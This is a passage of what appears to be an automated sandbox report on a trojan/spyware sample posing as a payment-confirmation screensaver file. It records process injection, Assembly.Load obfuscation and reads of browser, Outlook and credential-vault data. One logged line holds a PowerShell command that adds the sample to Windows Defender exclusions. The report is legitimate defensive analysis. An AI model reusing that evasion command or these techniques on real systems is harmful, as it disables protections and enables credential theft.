Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ABD06D 3_2_00ABD06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A43040 3_2_00A43040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A5905A 3_2_00A5905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ACD13F 3_2_00ACD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AE1238 3_2_00AE1238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A3F3CF 3_2_00A3F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A47353 3_2_00A47353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A75485 3_2_00A75485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A51489 3_2_00A51489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A7D47D 3_2_00A7D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AE35DA 3_2_00AE35DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A4351F 3_2_00A4351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AC579A 3_2_00AC579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A757C3 3_2_00A757C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AD771D 3_2_00AD771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ADF8EE 3_2_00ADF8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ABF8C4 3_2_00ABF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AC394B 3_2_00AC394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AC5955 3_2_00AC5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00AF3A83 3_2_00AF3A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A3FBD7 3_2_00A3FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ACDBDA 3_2_00ACDBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A67B00 3_2_00A67B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ADFDDD 3_2_00ADFDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00ACBF14 3_2_00ACBF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A6DF7C 3_2_00A6DF7C
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E95B4B 6_2_61E95B4B
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E49154 6_2_61E49154
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E42303 6_2_61E42303
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E5C4BF 6_2_61E5C4BF
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E496D7 6_2_61E496D7
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E7A6D0 6_2_61E7A6D0
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E469E8 6_2_61E469E8
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E43923 6_2_61E43923
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E398B9 6_2_61E398B9
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E30BC6 6_2_61E30BC6
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E1FA30 6_2_61E1FA30
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E4BDFA 6_2_61E4BDFA
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E26D8F 6_2_61E26D8F
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E17CC0 6_2_61E17CC0
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E35C3D 6_2_61E35C3D
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E44EC4 6_2_61E44EC4
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 79F86C1EDBBC69652A03A0F5667B3985BCF1E19F16FA3B8C7934E5B97AB8586D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00A8373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00A83F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00A3E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00AAF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00A3DF5C appears 137 times
Source: Payent confirmation copy 00888754087.scr Static PE information: invalid certificate
Source: sqlite3.dll.6.dr Static PE information: Number of sections : 18 > 10
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.366246314.0000000000864000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.366062823.0000000000410000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.369909193.0000000005210000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.0000000002401000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000000.342344637.0000000000348000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameEVew.exe. vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.00000000025B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTL.dll" vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr Binary or memory string: OriginalFilenameEVew.exe. vs Payent confirmation copy 00888754087.scr
Source: C:\Windows\SysWOW64\finger.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Source: Payent confirmation copy 00888754087.scr Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payent confirmation copy 00888754087.scr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winSCR@9/8@20/12
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\11v105ky.cvg.ps1
Source: Payent confirmation copy 00888754087.scr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Payent confirmation copy 00888754087.scr Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\finger.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: finger.exe, 00000006.00000002.868111071.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: Payent confirmation copy 00888754087.scr Virustotal: Detection: 57%
Source: Payent confirmation copy 00888754087.scr ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr" /S
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: wow64win.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: wow64cpu.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: version.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: bcrypt.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: mozglue.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: webio.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wdscore.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: riched32.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: riched20.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: version.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Windows\SysWOW64\RichEd32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Payent confirmation copy 00888754087.scr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Payent confirmation copy 00888754087.scr Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Payent confirmation copy 00888754087.scr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: EVew.pdb source: Payent confirmation copy 00888754087.scr
Source: Binary string: finger.pdb source: RegSvcs.exe, 00000003.00000002.388789742.0000000000834000.00000004.00000020.00020000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000002.866951455.0000000000414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EVew.pdbSHA256 source: Payent confirmation copy 00888754087.scr
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.388824636.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.389029493.0000000001F30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.0000000002240000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.388630935.0000000001DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HP9gbzNVWxqFR.exe, 00000005.00000000.372400998.0000000000A6F000.00000002.00000001.01000000.00000009.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401709637.000000000007F000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

Source: Payent confirmation copy 00888754087.scr, Form3.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs .Net Code: qDso2BSMRn System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.410000.1.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs .Net Code: qDso2BSMRn System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payent confirmation copy 00888754087.scr.2855d80.2.raw.unpack, .cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: Payent confirmation copy 00888754087.scr Static PE information: 0x9C1061E0 [Fri Dec 20 14:55:28 2052 UTC]
Source: sqlite3.dll.6.dr Static PE information: section name: /4
Source: sqlite3.dll.6.dr Static PE information: section name: /19
Source: sqlite3.dll.6.dr Static PE information: section name: /31
Source: sqlite3.dll.6.dr Static PE information: section name: /45
Source: sqlite3.dll.6.dr Static PE information: section name: /57
Source: sqlite3.dll.6.dr Static PE information: section name: /70
Source: sqlite3.dll.6.dr Static PE information: section name: /81
Source: sqlite3.dll.6.dr Static PE information: section name: /92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004014F0 push FFFFFF89h; retn D8D9h 3_2_00401A97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004014F0 push ebx; retn F2A0h 3_2_00401B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0042D963 push edi; iretd 3_2_0042D96C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00407109 push cs; iretd 3_2_0040710B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004149E2 push edi; retf 3_2_004149E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00406365 push ebx; ret 3_2_00406366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00403370 push eax; ret 3_2_00403372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00417E8E push ebx; iretd 3_2_00417E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00414F55 push 00000079h; retf 3_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0040D75B push ss; ret 3_2_0040D760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041870B pushad ; retf 3_2_0041870C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0041AF95 push esi; iretd 3_2_0041AF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00A3DFA1 push ecx; ret 3_2_00A3DFB4
Source: Payent confirmation copy 00888754087.scr Static PE information: section name: .text entropy: 7.80372244254093
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs High entropy of concatenated method names: 'JnFWUNR6c4', 'STFWPpgN7e', 'MVJWBDIiQx', 'PISWT7Fs5O', 'LCbW15q6YI', 'EQXWuDtywd', 'xF1W0B9lYN', 'Jg2Ww1uIDG', 'kbVW88uiL1', 'h89WgeJSXA'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, x85usGnCwJnBeo8rDc.cs High entropy of concatenated method names: 'gZMIC6XqPj', 'tgkIReoyrr', 'FvoIa8uFvu', 'CrNIqZVXJ3', 'utQIir4t6U', 'VCpIOIBoCd', 'WCXIArtjgL', 'e4SIMUsped', 'myUI5iKDu9', 'bUFIetarx2'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, rg35JuudNuuPPIfUtX.cs High entropy of concatenated method names: 'Dispose', 'agG38UTXLa', 'ahDJqPAUtA', 'lZhF1JrQW4', 'waL3gJ6xkE', 'QhH3zxDPUe', 'ProcessDialogKey', 'aemJYptMIA', 'jRUJ3EaeDA', 'bPfJJYcU8H'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, snYq7vjt6RoVqfKG38.cs High entropy of concatenated method names: 'zvr9a3NPuV', 'UvB9qb6srq', 'mdX9siTiD7', 'Hqw9i38FRK', 'H0g9OvDBn8', 'q4I9f1WQGe', 'MxJ9AaWCsO', 'Roe9Mg2wfq', 'DmV9rGGoTp', 'Tpy95DruYV'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, mHDMjBXdZAhCJgRv98.cs High entropy of concatenated method names: 'zZqQkrKuOi', 'uvBQWXrxk4', 'HXrQnJM5HB', 'VwmQblhPQy', 'CltQva3dHH', 'Tn5n18cFOn', 'Dk3nuqhVMX', 'gQqn0WYeTd', 'kuQnwks0tZ', 'OrJn8Luj4K'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, APyjbyvbetLgTTfUX7.cs High entropy of concatenated method names: 'oyy9G4rYka', 'JTP94UICWT', 'dY199liEP1', 'Hfp9LSHDLy', 'm4e9mqGE3C', 'PU89KQ9Xik', 'Dispose', 'oiaHV2XbX6', 'kiTHW8Dyme', 'GItHx75uek'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, pNd39XzPNIQr9WNHMd.cs High entropy of concatenated method names: 'EFLtSyJiBG', 'bdPtC7rL3J', 'L74tRtBn4y', 'EWuta4rkgm', 'm9ntqB9e5w', 'thgticGRSo', 'bZ6tObvMKD', 'idgtKafOnU', 'vW1t74InP9', 'FIMt6UFtH5'
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, W3xqtbssSmfMGuTvJuC.cs High entropy of concatenated method names: 'CnttgCwOv3', 'VohtzFRGDd', 'UUsLYI9iyO', 'FKhL3YaRqC', 'yXuLJAVIui', 'Yg9LdxPUxL', 'AhuLo4vnxn', 'bmYLkgm6Rk', 't3JLVOtWrf', 'aQxLW8UBMn'
